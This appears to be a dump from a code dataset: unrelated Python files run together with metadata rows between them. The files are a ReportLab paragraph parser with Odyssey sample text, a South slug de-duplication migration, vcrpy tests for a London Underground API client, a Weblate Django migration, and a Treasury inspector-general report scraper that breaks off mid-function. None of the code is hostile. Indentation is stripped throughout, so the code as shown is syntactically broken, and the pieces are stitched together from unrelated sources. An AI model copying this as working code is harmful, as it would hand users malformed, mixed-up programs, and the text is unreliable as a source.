for k, v in kw.items():
assert getattr(frag,k)==v
return frag
def getAttributes(self,attr,attrMap):
A = {}
for k, v in attr.items():
if not self.caseSensitive:
k = string.lower(k)
if k in attrMap.keys():
j = attrMap[k]
func = j[1]
try:
A[j[0]] = (func is None) and v or func(v)
except:
self._syntax_error('%s: invalid value %s'%(k,v))
else:
self._syntax_error('invalid attribute name %s'%k)
return A
#----------------------------------------------------------------
def __init__(self,verbose=0):
self.caseSensitive = 0
xmllib.XMLParser.__init__(self,verbose=verbose)
def _iReset(self):
self.fragList = []
if hasattr(self, 'bFragList'): delattr(self,'bFragList')
def _reset(self, style):
'''reset the parser'''
xmllib.XMLParser.reset(self)
# initialize list of string segments to empty
self.errors = []
self._style = style
self._iReset()
#----------------------------------------------------------------
def handle_data(self,data):
"Creates an intermediate representation of string segments."
frag = copy.copy(self._stack[-1])
if hasattr(frag,'cbDefn'):
kind = frag.cbDefn.kind
if data: self._syntax_error('Only empty <%s> tag allowed' % kind)
elif hasattr(frag,'_selfClosingTag'):
if data!='': self._syntax_error('No content allowed in %s tag' % frag._selfClosingTag)
return
else:
# if sub and super are both on they will cancel each other out
if frag.sub == 1 and frag.super == 1:
frag.sub = 0
frag.super = 0
if frag.sub:
frag.rise = -frag.fontSize*subFraction
frag.fontSize = max(frag.fontSize-sizeDelta,3)
elif frag.super:
frag.rise = frag.fontSize*superFraction
frag.fontSize = max(frag.fontSize-sizeDelta,3)
if frag.greek:
frag.fontName = 'symbol'
data = _greekConvert(data)
# bold, italic, and underline
frag.fontName = tt2ps(frag.fontName,frag.bold,frag.italic)
#save our data
frag.text = data
if hasattr(frag,'isBullet'):
delattr(frag,'isBullet')
self.bFragList.append(frag)
else:
self.fragList.append(frag)
def handle_cdata(self,data):
self.handle_data(data)
def _setup_for_parse(self,style):
self._seq = reportlab.lib.sequencer.getSequencer()
self._reset(style) # reinitialise the parser
def parse(self, text, style):
"""Given a formatted string will return a list of
ParaFrag objects with their calculated widths.
If errors occur None will be returned and the
self.errors holds a list of the error messages.
"""
# AR 20040612 - when we feed Unicode strings in, sgmlop
# tries to coerce to ASCII. Must intercept, coerce to
# any 8-bit encoding which defines most of 256 points,
# and revert at end. Yuk. Preliminary step prior to
# removal of parser altogether.
enc = self._enc = 'utf8' #our legacy default
self._UNI = type(text) is UnicodeType
if self._UNI:
text = text.encode(enc)
self._setup_for_parse(style)
# the xmlparser requires that all text be surrounded by xml
# tags, therefore we must throw some unused flags around the
# given string
if not(len(text)>=6 and text[0]=='<' and _re_para.match(text)):
text = "<para>"+text+"</para>"
self.feed(text)
self.close() # force parsing to complete
return self._complete_parse()
def _complete_parse(self):
del self._seq
style = self._style
del self._style
if len(self.errors)==0:
fragList = self.fragList
bFragList = hasattr(self,'bFragList') and self.bFragList or None
self._iReset()
else:
fragList = bFragList = None
if self._UNI:
#reconvert to unicode
if fragList:
for frag in fragList:
frag.text = unicode(frag.text, self._enc)
if bFragList:
for frag in bFragList:
frag.text = unicode(frag.text, self._enc)
return style, fragList, bFragList
def _tt_parse(self,tt):
tag = tt[0]
try:
start = getattr(self,'start_'+tag)
end = getattr(self,'end_'+tag)
except AttributeError:
raise ValueError('Invalid tag "%s"' % tag)
start(tt[1] or {})
C = tt[2]
if C:
M = self._tt_handlers
for c in C:
M[type(c) is TupleType](c)
end()
def tt_parse(self,tt,style):
'''parse from tupletree form'''
self._setup_for_parse(style)
self._tt_handlers = self.handle_data,self._tt_parse
self._tt_parse(tt)
return self._complete_parse()
if __name__=='__main__':
from reportlab.platypus import cleanBlockQuotedText
_parser=ParaParser()
def check_text(text,p=_parser):
print '##########'
text = cleanBlockQuotedText(text)
l,rv,bv = p.parse(text,style)
if rv is None:
for l in _parser.errors:
print l
else:
print 'ParaStyle', l.fontName,l.fontSize,l.textColor
for l in rv:
print l.fontName,l.fontSize,l.textColor,l.bold, l.rise, '|%s|'%l.text[:25],
if hasattr(l,'cbDefn'):
print 'cbDefn',getattr(l.cbDefn,'name',''),getattr(l.cbDefn,'label',''),l.cbDefn.kind
else: print
style=ParaFrag()
style.fontName='Times-Roman'
style.fontSize = 12
style.textColor = black
style.bulletFontName = black
style.bulletFontName='Times-Roman'
style.bulletFontSize=12
text='''
<b><i><greek>a</greek>D</i></b>β<unichr value="0x394"/>
<font name="helvetica" size="15" color=green>
Tell me, O muse, of that ingenious hero who travelled far and wide
after</font> he had sacked the famous town of Troy. Many cities did he visit,
and many were the nations with whose manners and customs he was acquainted;
moreover he suffered much by sea while trying to save his own life
and bring his men safely home; but do what he might he could not save
his men, for they perished through their own sheer folly in eating
the cattle of the Sun-god Hyperion; so the god prevented them from
ever reaching home. Tell me, too, about all these things, O daughter
of Jove, from whatsoever source you<super>1</super> may know them.
'''
check_text(text)
check_text('<para> </para>')
check_text('<para font="times-bold" size=24 leading=28.8 spaceAfter=72>ReportLab -- Reporting for the Internet Age</para>')
check_text('''
<font color=red>τ</font>Tell me, O muse, of that ingenious hero who travelled far and wide
after he had sacked the famous town of Troy. Many cities did he visit,
and many were the nations with whose manners and customs he was acquainted;
moreover he suffered much by sea while trying to save his own life
and bring his men safely home; but do what he might he could not save
his men, for they perished through their own sheer folly in eating
the cattle of the Sun-god Hyperion; so the god prevented them from
ever reaching home. Tell me, too, about all these things, O daughter
of Jove, from whatsoever source you may know them.''')
check_text('''
Telemachus took this speech as of good omen and rose at once, for
he was bursting with what he had to say. He stood in the middle of
the assembly and the good herald Pisenor brought him his staff. Then,
turning to Aegyptius, "Sir," said he, "it is I, as you will shortly
learn, who have convened you, for it is I who am the most aggrieved.
I have not got wind of any host approaching about which I would warn
you, nor is there any matter of public moment on which I would speak.
My grieveance is purely personal, and turns on two great misfortunes
which have fallen upon my house. The first of these is the loss of
my excellent father, who was chief among all you here present, and
was like a father to every one of you; the second is much more serious,
and ere long will be the utter ruin of my estate. The sons of all
the chief men among you are pestering my mother to marry them against
her will. They are afraid to go to her father Icarius, asking him
to choose the one he likes best, and to provide marriage gifts for
his daughter, but day by day they keep hanging about my father's house,
sacrificing our oxen, sheep, and fat goats for their banquets, and
never giving so much as a thought to the quantity of wine they drink.
No estate can stand such recklessness; we have now no Ulysses to ward
off harm from our doors, and I cannot hold my own against them. I
shall never all my days be as good a man as he was, still I would
indeed defend myself if I had power to do so, for I cannot stand such
treatment any longer; my house is being disgraced and ruined. Have
respect, therefore, to your own consciences and to public opinion.
Fear, too, the wrath of heaven, lest the gods should be displeased
and turn upon you. I pray you by Jove and Themis, who is the beginning
and the end of councils, [do not] hold back, my friends, and leave
me singlehanded- unless it be that my brave father Ulysses did some
wrong to the Achaeans which you would now avenge on me, by aiding
and abetting these suitors. Moreover, if I am to be eaten out of house
and home at all, I had rather you did the eating yourselves, for I
could then take action against you to some purpose, and serve you
with notices from house to house till I got paid in full, whereas
now I have no remedy."''')
check_text('''
But as the sun was rising from the fair sea into the firmament of
heaven to shed light on mortals and immortals, they reached Pylos
the city of Neleus. Now the people of Pylos were gathered on the sea
shore to offer sacrifice of black bulls to Neptune lord of the Earthquake.
There were nine guilds with five hundred men in each, and there were
nine bulls to each guild. As they were eating the inward meats and
burning the thigh bones [on the embers] in the name of Neptune, Telemachus
and his crew arrived, furled their sails, brought their ship to anchor,
and went ashore. ''')
check_text('''
So the neighbours and kinsmen of Menelaus were feasting and making
merry in his house. There was a bard also to sing to them and play
his lyre, while two tumblers went about performing in the midst of
them when the man struck up with his tune.]''')
check_text('''
"When we had passed the [Wandering] rocks, with Scylla and terrible
Charybdis, we reached the noble island of the sun-god, where were
the goodly cattle and sheep belonging to the sun Hyperion. While still
at sea in my ship I could bear the cattle lowing as they came home
to the yards, and the sheep bleating. Then I remembered what the blind
Theban prophet Teiresias had told me, and how carefully Aeaean Circe
had warned me to shun the island of the blessed sun-god. So being
much troubled I said to the men, 'My men, I know you are hard pressed,
but listen while I <strike>tell you the prophecy that</strike> Teiresias made me, and
how carefully Aeaean Circe warned me to shun the island of the blessed
sun-god, for it was here, she said, that our worst danger would lie.
Head the ship, therefore, away from the island.''')
check_text('''A<B>C&D"E'F''')
check_text('''A< B> C& D" E' F''')
check_text('''<![CDATA[<>&'"]]>''')
check_text('''<bullet face=courier size=14 color=green>+</bullet>
There was a bard also to sing to them and play
his lyre, while two tumblers went about performing in the midst of
them when the man struck up with his tune.]''')
check_text('''<onDraw name="myFunc" label="aaa bbb">A paragraph''')
check_text('''<para><onDraw name="myFunc" label="aaa bbb">B paragraph</para>''')
# HVB, 30.05.2003: Test for new features
_parser.caseSensitive=0
check_text('''Here comes <FONT FACE="Helvetica" SIZE="14pt">Helvetica 14</FONT> with <STRONG>strong</STRONG> <EM>emphasis</EM>.''')
check_text('''Here comes <font face="Helvetica" size="14pt">Helvetica 14</font> with <Strong>strong</Strong> <em>emphasis</em>.''')
check_text('''Here comes <font face="Courier" size="3cm">Courier 3cm</font> and normal again.''')
check_text('''Before the break <br/>the middle line <br/> and the last line.''')
check_text('''This should be an inline image <img src='../docs/images/testimg.gif'/>!''')
check_text('''aaa bbbb <u>underline </u> cccc''')
| bsd-3-clause | 6,241,397,755,660,166,000 | 34.284906 | 135 | 0.557778 | false |
romulojales/to-be-musician | to_be_a_musician/songs/migrations/0005_remove_duplicate_slugs.py | 1 | 7856 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
# Note: Don't use "from appname.models import ModelName".
# Use orm.ModelName to refer to models in this application,
# and orm['appname.ModelName'] for models in other applications.
songs = orm.Song.objects.select_related().order_by('artist__name',
'album__name',
'slug',
'id')
for song in songs:
duplicated_songs = (orm.Song.objects
.filter(artist__slug=song.artist.slug,
album__slug=song.album.slug,
slug=song.slug)
.exclude(pk=song.pk))
i = 1
for duplicated_song in duplicated_songs:
duplicated_song.slug = '{0}-{1}'.format(duplicated_song.slug[:47], i)
duplicated_song.save()
i += 1
def backwards(self, orm):
raise RuntimeError('Cannot reverse this migration.')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'songs.album': {
'Meta': {'object_name': 'Album'},
'api_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "'name'", 'overwrite': 'False'})
},
u'songs.artist': {
'Meta': {'object_name': 'Artist'},
'api_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "'name'", 'overwrite': 'False'})
},
u'songs.interpretation': {
'Meta': {'object_name': 'Interpretation'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_update': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'song': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['songs.Song']"}),
'songsterr_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'soundcloud_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '36', 'blank': 'True'}),
'youtube_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'songs.song': {
'Meta': {'object_name': 'Song'},
'album': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['songs.Album']"}),
'api_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'artist': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['songs.Artist']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "'name'", 'overwrite': 'False'}),
'tinysong_url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
}
}
complete_apps = ['songs']
symmetrical = True
| apache-2.0 | -7,906,301,131,644,745,000 | 69.142857 | 208 | 0.53055 | false |
adamgilman/tube-python | tube/tests/test_tflAPI.py | 1 | 3067 | import unittest
from tube.tflAPI import TFLapi
import vcr
my_vcr = vcr.VCR(
serializer = 'json',
cassette_library_dir = 'tube/tests/fixtures/cassettes',
record_mode = 'once',
match_on = ['uri', 'method'],
)
import logging
logging.basicConfig() # you need to initialize logging, otherwise you will not see anything from vcrpy
vcr_log = logging.getLogger("vcr")
vcr_log.setLevel(logging.ERROR)
class TestTFLapiByURL(unittest.TestCase):
def setUp(self):
self.api = TFLapi()
def test_VerifyCorrectURLFetched(self):
with my_vcr.use_cassette('Detail-OXC-B.json'):
detail = self.api.getDetailed(station="OXC", line="B")
self.assertEqual(detail.station, "OXC")
self.assertEqual(detail.line, "B")
def test_VerifyPlatformsQuantities(self):
#camden town has 4 northern line platforms
with my_vcr.use_cassette('Detail-CTN-N.json'):
detail = self.api.getDetailed(station="CTN", line="N")
self.assertEqual(detail.station, "CTN")
self.assertIsInstance(detail.platforms, list)
self.assertEqual( len(detail.platforms), 4)
#oxford circus has 2 bakerloo platforms
with my_vcr.use_cassette('Detail-OXC-B.json'):
detail = self.api.getDetailed(station="OXC", line="B")
self.assertEqual(detail.station, "OXC")
self.assertIsInstance(detail.platforms, list)
self.assertEqual( len(detail.platforms), 2)
def test_VerifyPlatformsIdentified(self):
with my_vcr.use_cassette('Detail-CTN-N.json'):
detail = self.api.getDetailed(station="CTN", line="N")
self.assertEqual(detail.platforms[0].name, "Northbound - Platform 1")
self.assertEqual(detail.platforms[1].name, "Southbound - Platform 2")
self.assertEqual(detail.platforms[2].name, "Northbound - Platform 3")
self.assertEqual(detail.platforms[3].name, "Southbound - Platform 4")
def test_VerifyTrainsOnPlatforms(self):
#need testcase for no trains on platforms
with my_vcr.use_cassette('Detail-OXC-B(TrainCode).json'):
detail = self.api.getDetailed(station="OXC", line="B")
self.assertIsInstance(detail.platforms[0].trains, list)
self.assertEqual(detail.platforms[0].trains[0].leadingcar_id, "1031576")
self.assertEqual(detail.platforms[0].trains[0].set_number, "236")
self.assertEqual(detail.platforms[0].trains[0].trip_number, "12")
self.assertEqual(detail.platforms[0].trains[0].arrival_seconds, "24")
self.assertEqual(detail.platforms[0].trains[0].arrival_time, "0:30")
self.assertEqual(detail.platforms[0].trains[0].current_location, "Between Regents Park and Oxford Circus")
self.assertEqual(detail.platforms[0].trains[0].destination, "Elephant and Castle")
self.assertEqual(detail.platforms[0].trains[0].destination_code, "154")
self.assertEqual(detail.platforms[0].trains[0].platform_departure_time, "15:28:23")
self.assertEqual(detail.platforms[0].trains[0].interval_between_previous_train, "24")
self.assertEqual(detail.platforms[0].trains[0].departed_current_station, "0")
self.assertEqual(detail.platforms[0].trains[0].direction, "0")
self.assertEqual(detail.platforms[0].trains[0].track_code, "TB391B") | bsd-3-clause | 7,684,105,499,917,301,000 | 43.463768 | 109 | 0.738507 | false |
dontnod/weblate | weblate/trans/migrations/0021_auto_20190321_1004.py | 1 | 3976 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.17 on 2019-03-21 10:04
from __future__ import unicode_literals
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("trans", "0020_auto_20190321_0921")]
operations = [
migrations.AddField(
model_name="change",
name="alert",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="trans.Alert",
),
),
migrations.AddField(
model_name="change",
name="whiteboard",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="trans.WhiteboardMessage",
),
),
migrations.AlterField(
model_name="change",
name="action",
field=models.IntegerField(
choices=[
(0, "Resource update"),
(1, "Translation completed"),
(2, "Translation changed"),
(5, "New translation"),
(3, "Comment added"),
(4, "Suggestion added"),
(6, "Automatic translation"),
(7, "Suggestion accepted"),
(8, "Translation reverted"),
(9, "Translation uploaded"),
(10, "Glossary added"),
(11, "Glossary updated"),
(12, "Glossary uploaded"),
(13, "New source string"),
(14, "Component locked"),
(15, "Component unlocked"),
(16, "Found duplicated string"),
(17, "Committed changes"),
(18, "Pushed changes"),
(19, "Reset repository"),
(20, "Merged repository"),
(21, "Rebased repository"),
(22, "Failed merge on repository"),
(23, "Failed rebase on repository"),
(28, "Failed push on repository"),
(24, "Parse error"),
(25, "Removed translation"),
(26, "Suggestion removed"),
(27, "Search and replace"),
(29, "Suggestion removed during cleanup"),
(30, "Source string changed"),
(31, "New string added"),
(32, "Bulk status change"),
(33, "Changed visibility"),
(34, "Added user"),
(35, "Removed user"),
(36, "Translation approved"),
(37, "Marked for edit"),
(38, "Removed component"),
(39, "Removed project"),
(40, "Found duplicated language"),
(41, "Renamed project"),
(42, "Renamed component"),
(43, "Moved component"),
(44, "New string to translate"),
(45, "New contributor"),
(46, "New whiteboard message"),
(47, "New component alert"),
],
default=2,
),
),
migrations.AlterField(
model_name="change",
name="comment",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="trans.Comment",
),
),
migrations.AlterField(
model_name="change",
name="suggestion",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="trans.Suggestion",
),
),
]
| gpl-3.0 | -1,935,226,728,235,325,400 | 36.158879 | 62 | 0.429326 | false |
lukerosiak/inspectors-general | inspectors/treasury.py | 2 | 15149 | #!/usr/bin/env python
import datetime
import logging
import os
import re
from urllib.parse import urljoin, unquote
from utils import utils, inspector, admin
# https://www.treasury.gov/about/organizational-structure/ig/Pages/audit_reports_index.aspx
archive = 2005
# options:
# standard since/year options for a year range to fetch from.
#
# Notes for IG's web team:
# - Add an agency for report 'OIG-09-015' listed on
# https://www.treasury.gov/about/organizational-structure/ig/Pages/by-date-2009.aspx
# - There is an extra tr.ms-rteTableEvenRow-default at the end of
# https://www.treasury.gov/about/organizational-structure/ig/Pages/by-date-2014.aspx
# - Add published dates for all reports at
# https://www.treasury.gov/about/organizational-structure/ig/Pages/other-reports.aspx
# - OIG-07-003 is posted twice, once with the wrong date
AUDIT_REPORTS_BASE_URL = "https://www.treasury.gov/about/organizational-structure/ig/Pages/by-date-{}.aspx"
TESTIMONIES_URL = "https://www.treasury.gov/about/organizational-structure/ig/Pages/testimony_index.aspx"
PEER_AUDITS_URL = "https://www.treasury.gov/about/organizational-structure/ig/Pages/peer_audit_reports_index.aspx"
OTHER_REPORTS_URL = "https://www.treasury.gov/about/organizational-structure/ig/Pages/other-reports.aspx"
SEMIANNUAL_REPORTS_URL = "https://www.treasury.gov/about/organizational-structure/ig/Pages/semiannual_reports_index.aspx"
AGENCY_NAMES = {
"bep": "The Bureau of Engraving & Printing",
"bfs": "The Bureau of the Fiscal Service",
"bpd": "The Bureau of the Public",
"cdfi": "The Community Development Financial Institution Fund",
"cfpb": "Consumer Financial Protection Bureau",
"do": "Department of the Treasury",
"esf": "Exchange Stabilization Fund",
"ffb": "Federal Financing Bank",
"fcen": "The Financial Crimes Enforcement Network",
"fincen": "The Financial Crimes Enforcement Network", # Another slug for the above
"fms": "Financial Management Service",
"gcerc": "Gulf Coast Ecosystem Restoration Council",
"ia": "The Office of International Affairs",
"mint": "The U.S. Mint",
"occ": "The Office of the Comptroller of the Currency",
"odcp": "Office of DC Pensions",
"ofac": "The Office of Foreign Assets Control",
"ofr": "Office of Financial Research",
"oig": "Office of the Inspector General",
"ots": "The Office of Thrift",
"restore": "The RESTORE Act",
"sblf": "Small Business Lending Fund",
"ssbci": "State Small Business Credit Initiative",
"tfi": "Office of Terrorism and Financial Intelligence",
"ttb": "The Alcohol and Tobacco Tax and Trade Bureau",
"tff": "Treasury Forfeiture Fund",
}
OTHER_URLS = {
"testimony": TESTIMONIES_URL,
"peer_review": PEER_AUDITS_URL,
"other": OTHER_REPORTS_URL,
}
UNRELEASED_REPORTS = [
# These reports do not say they are unreleased, but there are no links
"IGATI 2006",
"IGATI 2007",
"OIG-CA-07-001",
"OIG-08-039",
"OIG-08-013",
]
REPORT_AGENCY_MAP = {
"OIG-09-015": "mint", # See note to IG web team
}
REPORT_PUBLISHED_MAP = {
"OIG-CA-13-006": datetime.datetime(2013, 3, 29),
"OIG-13-CA-008": datetime.datetime(2013, 6, 10),
"Treasury Freedom of Information Act (FOIA) Request Review": datetime.datetime(2010, 11, 19),
"OIG-CA-14-017": datetime.datetime(2014, 9, 30),
"OIG-CA-14-015": datetime.datetime(2014, 9, 4),
"OIG-CA-15-023": datetime.datetime(2015, 7, 29),
"OIG-CA-15-020": datetime.datetime(2015, 6, 22),
"OIG-15-CA-012": datetime.datetime(2015, 4, 7),
"OIG-CA-15-024": datetime.datetime(2015, 9, 15),
"M-12-12 Reporting": datetime.datetime(2016, 1, 28),
"OIG-CA-16-012": datetime.datetime(2016, 3, 30),
"OIG-CA-16-014": datetime.datetime(2016, 4, 19),
"Role of Non-Career Officials in Treasury FOIA Processing": datetime.datetime(2016, 3, 9),
"OIG-CA-16-028": datetime.datetime(2016, 6, 30),
"OIG-CA-16-033A": datetime.datetime(2016, 7, 29),
"OIG-CA-16-033B": datetime.datetime(2016, 7, 29),
"OIG-CA-17-006": datetime.datetime(2016, 11, 10),
"OIG-CA-17-009": datetime.datetime(2017, 1, 27),
"OIG-CA-17-010": datetime.datetime(2017, 1, 27),
"OIG-CA-17-012": datetime.datetime(2017, 2, 27),
"OIG-CA-17-013": datetime.datetime(2017, 3, 1),
}
def run(options):
year_range = inspector.year_range(options, archive)
if datetime.datetime.now().month >= 10:
# October, November, and December fall into the next fiscal year
# Add next year to year_range to compensate
year_range.append(max(year_range) + 1)
# Pull the audit reports
for year in year_range:
if year < 2006: # This is the oldest year for these reports
continue
url = AUDIT_REPORTS_BASE_URL.format(year)
doc = utils.beautifulsoup_from_url(url)
results = doc.find_all("tr", class_=["ms-rteTableOddRow-default",
"ms-rteTableEvenRow-default"])
if not results:
if year != datetime.datetime.now().year + 1:
raise inspector.NoReportsFoundError("Treasury (%d)" % year)
for result in results:
report = audit_report_from(result, url, year_range)
if report:
inspector.save_report(report)
for report_type, url in OTHER_URLS.items():
doc = utils.beautifulsoup_from_url(url)
results = doc.select("#ctl00_PlaceHolderMain_ctl05_ctl01__ControlWrapper_RichHtmlField > p a")
if not results:
raise inspector.NoReportsFoundError("Treasury (%s)" % report_type)
for result in results:
if len(result.parent.find_all("a")) == 1:
result = result.parent
report = report_from(result, url, report_type, year_range)
if report:
inspector.save_report(report)
doc = utils.beautifulsoup_from_url(SEMIANNUAL_REPORTS_URL)
results = doc.select("#ctl00_PlaceHolderMain_ctl05_ctl01__ControlWrapper_RichHtmlField > p > a")
if not results:
raise inspector.NoReportsFoundError("Treasury (semiannual reports)")
for result in results:
report = semiannual_report_from(result, SEMIANNUAL_REPORTS_URL, year_range)
if report:
inspector.save_report(report)
def clean_text(text):
# A lot of text on this page has extra characters
return text.replace('\u200b', '').replace('\ufffd', ' ').replace('\xa0', ' ').strip()
SUMMARY_RE = re.compile("(OIG|OIG-CA|EVAL) *-? *([0-9]+) *- *([0-9R]+) *[:,]? +([^ ].*)")
SUMMARY_FALLBACK_RE = re.compile("([0-9]+)-(OIG)-([0-9]+) *:? *(.*)")
FILENAME_RE = re.compile("^(OIG-[0-9]+-[0-9]+)\\.pdf")
def audit_report_from(result, page_url, year_range):
if not clean_text(result.text):
# Empty row
return
# Get all direct child nodes
children = list(result.find_all(True, recursive=False))
published_on_text = clean_text(children[1].text)
# this is the header row
if published_on_text.strip() == "Date":
return None
date_formats = ['%m/%d/%Y', '%m/%d%Y']
published_on = None
for date_format in date_formats:
try:
published_on = datetime.datetime.strptime(published_on_text, date_format)
except ValueError:
pass
report_summary = clean_text(children[2].text)
if not report_summary:
# There is an extra row that we want to skip
return
report_summary = report_summary.replace("OIG-15-38Administrative",
"OIG-15-38 Administrative")
summary_match = SUMMARY_RE.match(report_summary)
summary_match_2 = SUMMARY_FALLBACK_RE.match(report_summary)
if summary_match:
report_id = summary_match.expand(r"\1-\2-\3")
title = summary_match.group(4)
elif summary_match_2:
report_id = summary_match_2.expand(r"(\2-\1-\3")
title = summary_match_2.group(4)
elif report_summary.startswith("IGATI") and published_on is not None:
# There are two such annual reports from different years, append the year
report_id = "IGATI %d" % published_on.year
title = report_summary
elif report_summary == "Report on the Bureau of the Fiscal Service Federal " \
"Investments Branch\u2019s Description of its Investment/" \
"Redemption Services and the Suitability of the Design and Operating " \
"Effectiveness of its Controls for the Period August 1, 2013 to " \
"July 31, 2014":
# This one is missing its ID in the index
report_id = "OIG-14-049"
title = report_summary
elif report_summary == "Correspondence related to the resolution of audit recommendation 1 OIG-16-001 OFAC Libyan Sanctions Case Study (Please read this correspondence in conjunction with the report.)":
# Need to make up a report_id for this supplemental document
report_id = "OIG-16-001-resolution"
title = report_summary
else:
try:
filename_match = FILENAME_RE.match(os.path.basename(result.a["href"]))
report_id = filename_match.group(1)
title = report_summary
except (ValueError, IndexError, AttributeError):
raise Exception("Couldn't parse report ID: %s" % repr(report_summary))
if report_id == 'OIG-15-015' and \
'Financial Statements for hte Fiscal Years 2014 and 2013' in title:
# This report is listed twice, once with a typo
return
if report_id == 'OIG-07-003' and published_on_text == '11/23/2006':
# This report is listed twice, once with the wrong date
return
# There are copy-paste errors with several retracted reports
if report_id == 'OIG-14-037':
if published_on.year == 2011 or published_on.year == 2010:
return
if report_id == 'OIG-13-021' and published_on_text == '12/12/2012':
return
if published_on is None:
admin.log_no_date("treasury", report_id, title)
return
agency_slug_text = children[0].text
if report_id in REPORT_AGENCY_MAP:
agency_slug = REPORT_AGENCY_MAP[report_id]
else:
agency_slug = clean_text(agency_slug_text.split("&")[0]).lower()
if (report_id in UNRELEASED_REPORTS or
"If you would like a copy of this report" in report_summary or
"If you would like to see a copy of this report" in report_summary or
"have been removed from the OIG website" in report_summary or
"removed the auditors\u2019 reports from the" in report_summary or
"Classified Report" in report_summary or
"Classified Audit Report" in report_summary or
"Sensitive But Unclassified" in report_summary or
"To obtain further information, please contact the OIG" in report_summary):
unreleased = True
report_url = None
landing_url = page_url
else:
link = result.select("a")[0]
report_url = urljoin(AUDIT_REPORTS_BASE_URL, link['href'])
if report_url == AUDIT_REPORTS_BASE_URL:
raise Exception("Invalid link found: %s" % link)
unreleased = False
landing_url = None
# HTTPS, even if they haven't updated their links yet
if report_url is not None:
report_url = re.sub("^http://www.treasury.gov", "https://www.treasury.gov", report_url)
if report_url == "https://www.treasury.gov/about/organizational-structure/ig/Documents/OIG-11-071.pdf":
